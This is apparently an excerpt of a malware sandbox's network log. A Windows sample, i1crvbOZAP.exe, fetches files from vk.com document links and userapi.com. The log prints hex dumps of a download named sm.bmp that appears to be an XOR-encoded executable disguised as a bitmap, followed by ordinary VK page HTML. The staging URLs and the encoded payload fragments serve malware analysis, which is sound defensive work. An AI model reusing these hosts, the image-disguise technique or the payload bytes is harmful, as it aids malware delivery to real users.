2024-03-28 08:15:03 UTC	321	OUT	GET /doc329118071_676351514?hash=oPyw4gmGJJun6lU9sLErlqtdzmddNG56Nt55YfEENPc&dl=RCDwPdBUKrCPj7fUCgfOWpgDFGrhD5rBE6MQvUIUlHz&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-03-28 08:15:04 UTC	1222	IN	HTTP/1.1 302 Found Server: kittenx Date: Thu, 28 Mar 2024 08:15:04 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.116219 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Fri, 28 Mar 2025 14:03:05 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9100817847000315748_8a9tAneCl8QKreDDHMWVCL3WO7gqDT6NjnrDJFCMEfz; expires=Fri, 28 Mar 2025 08:15:04 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-22.userapi.com/c909218/u329118071/docs/d56/4889f8ef891f/crypted.bmp?extra=-LBKaniv3MRw05ku3d9Nr104OdGpfnHeS5WOM7N4VWIoDXtSDCsvx-PvX4usDvxD9PpMarCAxpv-2NOeS4PDQq1WB5ljz_YtSA7SRvFwbLxszvLa9N7DPL7VqJF6YMSwG6COqmXFKEg_y4Q X-Frontend: front661402 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: anJBPRx3ZxKdZnGOu1_6VxlWCXAr4w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49787	95.142.206.0	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:03 UTC	416	OUT	GET /c237131/u329118071/docs/d54/a41cd49a4cc3/sm.bmp?extra=YhKLSKJ3mgzcHEPhKt29yMVwT7syu4DSX-r8FiniNu26GoYh--bacebk_lAweHd_nom6ZTYuZ1nbNqpT3z-oQcCb9yjZPvFkcjabKXHoUaPs7vLK8L7aMJYgb4R4exgpsuU8bf8kljG-Phg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-20.userapi.com Connection: Keep-Alive
2024-03-28 08:15:04 UTC	587	IN	HTTP/1.1 200 OK Server: kittenx Date: Thu, 28 Mar 2024 08:15:04 GMT Content-Type: image/x-ms-bmp Content-Length: 4309412 Connection: close Last-Modified: Sun, 24 Mar 2024 14:29:55 GMT ETag: "660038e3-41c1a4" Expires: Sat, 27 Apr 2024 08:15:04 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: ftUmnUp61-PSgt3ulivZPV0-fbCEVg Accept-Ranges: bytes
2024-03-28 08:15:04 UTC	15797	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 95 15 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 45 50 15 15 59 14 16 15 fb 03 9b 8b 15 15 15 15 15 15 15 15 f5 15 1b 14 1e 14 45 15 15 57 2e 15 15 a7 10 15 15 15 15 15 ab 75 2e 15 15 35 15 15 15 95 2e 15 15 15 ff 15 15 35 15 15 15 17 15 15 11 15 15 15 15 15 15 15 11 15 15 15 15 15 15 15 15 75 54 15 15 17 15 15 0a 93 57 15 17 15 ff 90 15 15 01 15 15 01 15 15 15 15 01 15 15 01 15 15 15 15 15 15 01 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1EPYEW.u.5.5uTW
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 04 0c 79 4e 3d d0 15 15 13 a2 06 04 2d c5 ea ea ea 2d dd ea ea ea 2d d6 ea ea ea 03 06 15 35 15 15 15 15 3d d3 15 15 13 2f 8a ea ea ea 33 2d 00 ea ea ea 15 04 07 79 04 06 79 4e 3d 5e 15 15 1f a2 06 04 2d 15 15 15 15 04 0a 79 04 55 79 4e 3d 5e 15 15 1f a2 06 04 2d 15 15 15 15 04 03 04 02 cf 06 04 2d 00 ea ea ea 15 15 15 06 25 16 15 00 15 15 15 55 15 15 04 2d 4e 15 15 15 eb 19 1c 15 50 17 15 15 15 39 15 15 15 66 15 15 15 2d 32 15 15 15 04 0a 04 55 c3 06 04 35 14 15 15 15 3d d3 15 15 13 2f cd ea ea ea 33 2d db ea ea ea 04 15 3f 03 06 15 2d 0a 15 15 15 04 0f 79 04 0e 79 4e 3d 5e 15 15 1f a2 06 04 2d f1 ea ea ea 2d c9 ea ea ea 2d c2 ea ea ea 15 04 07 04 06 cd 06 04 2d bb ea ea ea 04 0d 04 0c cd 06 04 35 15 15 15 15 3d d2 15 15 13 2c 93 ea ea ea 33 2d 69 ea ea Data Ascii: yN=---5=/3-yyN=^-yUyN=^--%U-NP9f-2U5=/3-?-yyN=^----5=,3-i
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 04 2d 79 15 15 15 15 04 07 04 06 cd 06 04 2d 32 15 15 15 03 06 15 35 15 15 15 15 3d 77 14 15 13 2c ae ea ea ea 33 35 14 15 15 15 2d a5 ea ea ea 2d 2f 15 15 15 2d 20 15 15 15 04 0a 79 04 55 79 4e 3d 71 14 15 13 a2 06 04 2d 15 15 15 15 04 03 04 02 cf 06 04 35 15 15 15 15 3d 77 14 15 13 2c 69 ea ea ea 33 35 15 15 15 15 2d 64 ea ea ea 04 15 3f 04 0f 04 0e cd 06 04 2d 00 ea ea ea 15 06 25 16 15 8a 15 15 15 55 15 15 04 2d 65 15 15 15 eb 19 1d 15 50 17 15 15 15 79 15 15 15 47 15 15 15 2d 72 15 15 15 04 0f 79 04 0e 79 4e 3d 5e 15 15 1f a2 06 04 35 15 15 15 15 3d 76 14 15 13 2f c5 ea ea ea 33 35 15 15 15 15 2d d0 ea ea ea 04 03 04 02 cd 06 04 2d 15 15 15 15 04 0d 04 0c cd 06 04 2d aa ea ea ea 04 0a 04 55 cd 06 04 2d c9 ea ea ea 2d 10 15 15 15 2d 15 15 15 15 04 15 Data Ascii: -y-25=w,35--/- yUyN=q-5=w,i35-d?-%U-ePyG-ryyN=^5=v/35---U---
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 2d 0d 15 15 15 04 15 3f 15 04 07 04 06 cd 06 04 2d ac ea ea ea 03 06 15 2d a8 ea ea ea 04 0d 04 0c cf 06 04 35 15 15 15 15 3d 16 17 15 13 2f 68 ea ea ea 33 35 15 15 15 15 2d 67 ea ea ea 15 06 25 16 15 00 15 15 15 55 15 15 04 2d 6e 15 15 15 eb 19 14 15 50 17 15 15 15 1d 15 15 15 09 15 15 15 2d 16 15 15 15 04 15 3f 04 03 04 02 c3 06 04 2d 0a 15 15 15 03 06 15 2d 3d 15 15 15 04 0f 04 0e cf 06 04 2d f9 ea ea ea 04 0d 04 0c c3 06 04 35 14 15 15 15 3d 16 17 15 13 2c a0 ea ea ea 33 2d be ea ea ea 2d a9 ea ea ea 2d a2 ea ea ea 04 0a 04 55 c3 06 04 35 15 15 15 15 3d 16 17 15 13 2c 9a ea ea ea 33 2d 90 ea ea ea 15 04 07 79 04 06 79 4e 3d 5e 15 15 1f a2 06 04 2d da ea ea ea 15 15 15 06 25 16 15 b2 15 15 15 55 15 15 04 35 14 15 15 15 eb 1b 1b 15 2d 15 15 15 15 eb 19 Data Ascii: -?--5=/h35-g%U-nP-?--=-5=,3---U5=,3-yyN=^-%U5-
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: ea 33 35 17 15 15 15 2d 00 ea ea ea 04 0a 79 04 09 79 4e 3d 5e 15 15 1f a2 06 04 2d 05 ea ea ea 04 0d 04 0c cf 06 04 2d 15 15 15 15 04 0f 04 0e cf 06 04 2d b4 ea ea ea 04 15 3f 06 25 16 15 8f 15 15 15 55 15 15 04 35 17 15 15 15 eb 1b 04 15 2d 15 15 15 15 eb 19 04 15 50 16 15 15 15 5c 15 15 15 40 15 15 15 39 15 15 15 2d 51 15 15 15 03 06 15 2d 75 15 15 15 04 15 3f 04 03 04 02 cd 06 09 35 15 15 15 15 3d b7 17 15 13 2c dc ea ea ea 33 2d aa ea ea ea 15 04 07 04 06 c3 06 09 35 14 15 15 15 3d b4 17 15 13 2f b9 ea ea ea 33 2d b7 ea ea ea 04 0d 04 0c cd 06 09 2d 19 15 15 15 04 0a 04 55 cd 06 09 2d ba ea ea ea 04 0f 04 0e cd 06 09 2d 8d ea ea ea 2d 8e ea ea ea 2d 83 ea ea ea 15 15 06 25 16 15 b7 15 15 15 55 15 15 04 2d 5c 15 15 15 eb 19 1c 15 50 17 15 15 15 5d 15 Data Ascii: 35-yyN=^---?%U5-P\@9-Q-u?5=,3-5=/3--U----%U-\P]
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 04 0f 04 0e c3 06 04 2d 55 15 15 15 15 04 07 79 04 06 79 4e 3d 5e 15 15 1f a2 06 04 2d 08 15 15 15 03 06 15 35 15 15 15 15 3d ff 16 15 13 2c b0 ea ea ea 33 35 15 15 15 15 2d 8f ea ea ea 04 0a 04 55 cf 06 04 35 14 15 15 15 3d 2a 16 15 13 2f 91 ea ea ea 33 35 15 15 15 15 2d 6c ea ea ea 04 03 04 02 c3 06 04 2d 9c ea ea ea 04 15 3f 15 06 25 16 15 bf 15 15 15 55 15 15 04 2d 79 15 15 15 eb 19 02 15 50 17 15 15 15 09 15 15 15 33 15 15 15 2d 02 15 15 15 04 0a 79 04 55 79 4e 3d 5e 15 15 1f a2 06 04 2d 5a 15 15 15 04 15 3f 2d ed ea ea ea 2d e6 ea ea ea 04 0f 04 0e cd 06 04 2d 5f 15 15 15 04 0d 79 04 0c 79 4e 3d 5e 15 15 1f a2 06 04 35 15 15 15 15 3d ff 16 15 13 2f b6 ea ea ea 33 35 14 15 15 15 2d 8d ea ea ea 15 04 07 04 06 cf 06 04 2d 88 ea ea ea 04 03 79 04 09 79 Data Ascii: -UyyN=^-5=,35-U5=*/35-l-?%U-yP3-yUyN=^-Z?---_yyN=^5=/35--yy
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 15 15 15 04 0f 79 04 0e 79 4e 3d 5e 15 15 1f a2 06 04 2d 25 15 15 15 04 15 3f 04 0d 04 0c cf 06 04 35 15 15 15 15 3d cb 16 15 13 2c a8 ea ea ea 33 35 15 15 15 15 2d a7 ea ea ea 04 03 04 02 cf 06 04 2d c6 ea ea ea 03 06 15 2d 08 15 15 15 15 04 07 04 06 c3 06 04 35 14 15 15 15 3d cb 16 15 13 2c 92 ea ea ea 33 2d 68 ea ea ea 2d b3 ea ea ea 2d b4 ea ea ea 04 0a 04 09 cd 06 04 2d ac ea ea ea 15 06 25 16 15 b7 15 15 15 55 15 15 04 2d 9d 15 15 15 eb 19 0e 15 50 17 15 15 15 76 15 15 15 10 15 15 15 2d 4b 15 15 15 04 15 3f 04 03 79 04 02 79 4e 3d 5e 15 15 1f a2 06 04 2d 3e 15 15 15 04 0a 04 55 c3 06 04 2d f5 ea ea ea 2d cd ea ea ea 35 15 15 15 15 3d c8 16 15 13 2c a2 ea ea ea 33 35 14 15 15 15 2d b9 ea ea ea 04 0d 04 0c c3 06 04 35 15 15 15 15 3d c8 16 15 13 2f 83 Data Ascii: yyN=^-%?5=,35---5=,3-h---%U-Pv-K?yyN=^->U--5=,35-5=/
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 14 15 15 15 3d 68 11 15 13 2c 97 ea ea ea 33 2d 6d ea ea ea 15 15 15 06 25 16 15 bf 15 15 15 55 15 15 04 35 17 15 15 15 eb 1b 02 15 2d 15 15 15 15 eb 19 02 15 50 16 15 15 15 23 15 15 15 4c 15 15 15 04 15 15 15 2d 24 15 15 15 04 0d 04 0c cd 06 04 2d 21 15 15 15 15 04 07 79 04 06 79 4e 3d 6e 11 15 13 a2 06 04 35 14 15 15 15 3d 69 11 15 13 2f aa ea ea ea 33 2d a0 ea ea ea 04 03 04 09 cf 06 04 2d d6 ea ea ea 04 15 3f 04 0f 79 04 0e 79 4e 3d 6e 11 15 13 a2 06 04 2d 33 15 15 15 04 0a 04 55 cd 06 04 35 15 15 15 15 3d 69 11 15 13 2f 95 ea ea ea 33 2d 63 ea ea ea 2d dd ea ea ea 2d d6 ea ea ea 03 06 15 2d fb ea ea ea 15 15 06 25 16 15 b7 15 15 15 55 15 15 04 35 14 15 15 15 eb 1b 0f 15 2d 15 15 15 15 eb 19 0f 15 50 16 15 15 15 7c 15 15 15 09 15 15 15 48 15 15 15 2d Data Ascii: =h,3-m%U5-P#L-$-!yyN=n5=i/3--?yyN=n-3U5=i/3-c---%U5-P\|H-
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 04 0a 04 55 cd 06 04 2d aa ea ea ea 04 0d 04 0c cd 06 04 35 15 15 15 15 3d 0e 10 15 13 2f 97 ea ea ea 33 2d 6d ea ea ea 15 04 07 04 06 c3 06 04 2d 05 ea ea ea 15 15 06 25 16 15 8f 15 15 15 55 15 15 04 2d 65 15 15 15 eb 19 09 15 50 17 15 15 15 49 15 15 15 08 15 15 15 2d 42 15 15 15 04 0f 04 0e c3 06 04 2d 4e 15 15 15 04 03 04 02 cf 06 04 2d 80 15 15 15 2d 2f 15 15 15 35 15 15 15 15 3d 0e 10 15 13 2f d7 ea ea ea 33 35 15 15 15 15 2d a2 ea ea ea 04 0d 04 0c cf 06 04 2d a8 ea ea ea 04 0a 79 04 55 79 4e 3d 5e 15 15 1f a2 06 04 2d a0 ea ea ea 04 15 3f 15 04 07 04 06 cf 06 04 2d c9 ea ea ea 03 06 15 35 14 15 15 15 3d 09 10 15 13 2c 60 ea ea ea 33 2d 7e ea ea ea 15 15 06 25 16 15 bf 15 15 15 55 15 15 04 2d 8d 15 15 15 eb 19 10 15 50 17 15 15 15 2b 15 15 15 10 15 Data Ascii: U-5=/3-m-%U-ePI-B-N--/5=/35--yUyN=^-?-5=,`3-~%U-P+
2024-03-28 08:15:04 UTC	16384	IN	Data Raw: 15 2d 7b 15 15 15 04 15 3f 15 04 07 04 06 cd 06 04 2d 3b 15 15 15 03 06 15 2d 09 15 15 15 04 03 04 02 cf 06 04 35 15 15 15 15 3d ae 10 15 13 2f d5 ea ea ea 33 2d a3 ea ea ea 2d d2 ea ea ea 2d d7 ea ea ea 04 09 04 55 cf 06 04 2d db ea ea ea 04 0f 79 04 0e 79 4e 3d 5e 15 15 1f a2 06 04 35 14 15 15 15 3d a9 10 15 13 2c 93 ea ea ea 33 2d 69 ea ea ea 04 0d 04 0c cd 06 04 2d c5 ea ea ea 15 15 15 06 25 16 15 ba 15 15 15 55 15 15 04 35 14 15 15 15 eb 1b 19 15 2d 15 15 15 15 eb 19 19 15 50 16 15 15 15 18 15 15 15 52 15 15 15 3b 15 15 15 2d 1d 15 15 15 03 06 15 2d 25 15 15 15 04 0a 04 55 cf 06 04 35 15 15 15 15 3d ae 10 15 13 2c d9 ea ea ea 33 35 17 15 15 15 2d d4 ea ea ea 04 03 04 02 cf 06 04 2d 53 15 15 15 04 15 3f 2d ed ea ea ea 2d e6 ea ea ea 15 04 07 79 04 06 Data Ascii: -{?-;-5=/3---U-yyN=^5=,3-i-%U5-PR;--%U5=,35--S?--y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49790	93.186.225.194	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:04 UTC	319	OUT	GET /doc329118071_675792624?hash=XfyAKbRGjhzAxkfmvlCrdz9zJtdyzNRcHwmff3vnq80&dl=Ze3IH3BxY7vOa5jO9OGsVYOAjEXMtW2wRr8tC5P8SBE&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-03-28 08:15:05 UTC	2492	IN	HTTP/1.1 200 OK Server: kittenx Date: Thu, 28 Mar 2024 08:15:05 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 256647 Connection: close X-Powered-By: KPHP/7.4.116219 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Sat, 29 Mar 2025 20:05:59 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9105180709140324292_j43b3BCKsfBjENeTjd1lcIDMBlBLRcGK5EzVCQK2jxs; expires=Fri, 28 Mar 2025 08:15:05 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixlgck=7fef3348ece789cbb0; expires=Sat, 22 Mar 2025 10:15:40 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixstid=147984775_I342ZO7Bb5WPJIcS5dkNznPm0KlnUrBMtey6hEozE6L; expires=Fri, 28 Mar 2025 17:08:53 GMT; path=/; domain=.vk.com; secure; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front661700 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: ZroEI429SBabC7aQdxz6nZ9OQGB13w
2024-03-28 08:15:05 UTC	13892	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 27 65 6e 27 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 5f 6c 6f 67 6f 2e 69 63 6f 3f 37 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 70 77 61 2f 61 70 70 6c 65 2f 64 65 66 61 75 6c 74 2e 70 6e 67 3f 31 35 Data Ascii: <!DOCTYPE html><html lang='en' dir='ltr'><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" /><link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 22 77 69 64 74 68 22 3a 39 36 30 2c 22 77 69 64 74 68 44 65 63 22 3a 31 36 35 7d 2c 0a 0a 20 20 73 63 72 69 70 74 54 79 70 65 3a 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 2c 0a 7d 3b 3b 76 6b 2e 72 76 3d 22 31 31 36 32 31 39 22 3b 0a 0a 77 69 6e 64 6f 77 2e 6c 6f 63 44 6f 6d 61 69 6e 20 3d 20 76 6b 2e 68 6f 73 74 2e 6d 61 74 63 68 28 2f 5b 61 2d 7a 41 2d 5a 5d 2b 5c 2e 5b 61 2d 7a 41 2d 5a 5d 2b 5c 2e 3f 24 2f 29 5b 30 5d 3b 0a 77 69 6e 64 6f 77 2e 5f 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 69 66 20 28 2f 6f 70 65 72 61 2f 69 2e 74 65 73 74 28 5f 75 61 29 20 7c 7c 20 21 2f 6d 73 69 65 20 36 2f 69 2e 74 65 73 74 28 5f 75 61 29 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: "width":960,"widthDec":165}, scriptType: 'text/javascript',};;vk.rv="116219";window.locDomain = vk.host.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];window._ua = navigator.userAgent.toLowerCase();if (/opera/i.test(_ua) \|\| !/msie 6/i.test(_ua) \|\| document.
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 5f 32 30 5f 5f 49 63 6f 6e 73 22 20 73 74 72 6f 6b 65 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 3e 3c 67 20 69 64 3d 22 6d 75 73 69 63 5f 6f 75 74 6c 69 6e 65 5f 32 30 5f 5f 49 63 6f 6e 73 2d 32 30 2f 6d 75 73 69 63 5f 6f 75 74 6c 69 6e 65 5f 32 30 22 3e 3c 67 20 69 64 3d 22 6d 75 73 69 63 5f 6f 75 74 6c 69 6e 65 5f 32 30 5f 5f 6d 75 73 69 63 5f 6f 75 74 6c 69 6e 65 5f 32 30 22 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 32 30 76 32 30 48 30 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 2e 37 33 20 32 2e 30 35 61 32 2e 32 38 20 32 2e 32 38 20 30 20 30 20 31 20 32 2e 37 35 20 32 2e 32 33 76 37 2e 39 39 63 30 20 33 2e 35 37 2d 33 Data Ascii: _20__Icons" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><g id="music_outline_20__Icons-20/music_outline_20"><g id="music_outline_20__music_outline_20"><path d="M0 0h20v20H0z"/><path d="M14.73 2.05a2.28 2.28 0 0 1 2.75 2.23v7.99c0 3.57-3
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 35 37 37 20 31 33 2e 30 35 31 32 20 4c 20 31 33 2e 30 35 31 32 20 34 2e 38 35 37 37 22 2f 3e 0a 20 20 20 20 3c 2f 6d 61 73 6b 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 61 76 61 74 61 72 5f 68 65 70 74 5f 75 6e 64 65 72 6c 61 79 5f 66 69 6c 6c 22 20 78 31 3d 22 30 22 20 79 31 3d 22 30 22 20 78 32 3d 22 35 30 22 20 79 32 3d 22 35 30 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 32 45 45 36 41 38 22 20 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 2e 33 34 33 37 35 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 33 33 39 39 46 46 22 20 2f 3e 0a 20 20 20 20 20 20 3c 73 74 Data Ascii: 577 13.0512 L 13.0512 4.8577"/> </mask> <linearGradient id="avatar_hept_underlay_fill" x1="0" y1="0" x2="50" y2="50" gradientUnits="userSpaceOnUse"> <stop stop-color="#2EE6A8" /> <stop offset="0.34375" stop-color="#3399FF" /> <st
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 61 67 65 22 2c 22 76 6b 63 6f 6e 6e 65 63 74 5f 61 75 74 68 5f 63 61 70 74 63 68 61 5f 72 65 66 72 65 73 68 5f 61 75 64 69 6f 5f 62 75 74 74 6f 6e 5f 61 72 69 61 5f 6c 61 62 65 6c 22 3a 22 52 65 66 72 65 73 68 20 61 75 64 69 6f 22 2c 22 76 6b 63 6f 6e 6e 65 63 74 5f 72 65 66 72 65 73 68 5f 63 61 70 74 63 68 61 22 3a 22 52 65 66 72 65 73 68 22 2c 22 76 6b 63 6f 6e 6e 65 63 74 5f 72 65 66 72 65 73 68 5f 63 61 70 74 63 68 61 5f 76 69 61 22 3a 22 ce e1 ed ee e2 e8 f2 fc 20 f7 e5 f0 e5 e7 20 7b 74 69 6d 65 7d 22 2c 22 76 6b 63 6f 6e 6e 65 63 74 5f 61 75 74 68 5f 63 61 70 74 63 68 61 5f 65 6e 61 62 6c 65 5f 61 75 64 69 6f 5f 61 72 69 61 5f 6c 61 62 65 6c 22 3a 22 41 75 64 69 6f 20 74 65 73 74 22 2c 22 76 6b 63 6f 6e 6e 65 63 74 5f 61 75 74 68 5f 63 61 70 74 63 Data Ascii: age","vkconnect_auth_captcha_refresh_audio_button_aria_label":"Refresh audio","vkconnect_refresh_captcha":"Refresh","vkconnect_refresh_captcha_via":" {time}","vkconnect_auth_captcha_enable_audio_aria_label":"Audio test","vkconnect_auth_captc
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 64 20 3c 62 3e 61 72 65 20 6e 6f 74 20 73 61 76 65 64 3c 5c 2f 62 3e 20 22 2c 22 76 69 64 65 6f 5f 6c 69 76 65 5f 65 6e 64 6c 65 73 73 5f 63 6f 6e 66 69 72 6d 5f 62 6f 78 5f 79 65 73 5f 62 74 6e 22 3a 22 43 6f 6e 74 69 6e 75 65 20 77 69 74 68 6f 75 74 20 72 65 63 6f 72 64 69 6e 67 22 2c 22 67 6c 6f 62 61 6c 5f 64 6f 6e 74 5f 77 61 72 6e 5f 6e 65 78 74 5f 74 69 6d 65 22 3a 22 44 6f 20 6e 6f 74 20 73 68 6f 77 20 74 68 69 73 20 77 61 72 6e 69 6e 67 20 61 67 61 69 6e 2e 22 2c 22 76 69 64 65 6f 5f 70 75 62 6c 69 63 61 74 69 6f 6e 5f 74 69 6d 65 5f 6c 61 62 65 6c 22 3a 22 50 6f 73 74 69 6e 67 20 74 69 6d 65 22 2c 22 70 72 6f 66 69 6c 65 5f 77 61 6c 6c 5f 70 6f 73 74 70 6f 6e 65 5f 62 74 6e 22 3a 22 53 63 68 65 64 75 6c 65 22 2c 22 76 69 64 65 6f 5f 75 70 6c 6f Data Ascii: d <b>are not saved<\/b> ","video_live_endless_confirm_box_yes_btn":"Continue without recording","global_dont_warn_next_time":"Do not show this warning again.","video_publication_time_label":"Posting time","profile_wall_postpone_btn":"Schedule","video_uplo
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 20 7b 6e 61 6d 65 33 7d 2c 20 7b 6e 61 6d 65 34 7d 20 61 6e 64 a0 7b 6e 61 6d 65 35 7d 20 72 65 63 65 69 76 65 64 20 79 6f 75 72 20 67 69 66 74 3a 20 7b 70 72 6f 64 75 63 74 73 7d 22 2c 22 7b 6e 61 6d 65 31 7d 2c 20 7b 6e 61 6d 65 32 7d 2c 20 7b 6e 61 6d 65 33 7d 2c 20 7b 6e 61 6d 65 34 7d 20 61 6e 64 a0 7b 6e 61 6d 65 35 7d 20 72 65 63 65 69 76 65 64 20 79 6f 75 72 20 67 69 66 74 73 3a 20 7b 70 72 6f 64 75 63 74 73 7d 22 5d 2c 22 70 75 72 63 68 61 73 65 73 5f 73 74 69 63 6b 65 72 73 5f 67 69 66 74 5f 72 65 73 75 6c 74 5f 34 5f 72 65 63 69 70 69 65 6e 74 73 5f 61 6e 64 5f 6e 5f 6d 6f 72 65 5f 73 69 6e 67 6c 65 22 3a 5b 22 22 2c 22 7b 6e 61 6d 65 31 7d 2c 20 7b 6e 61 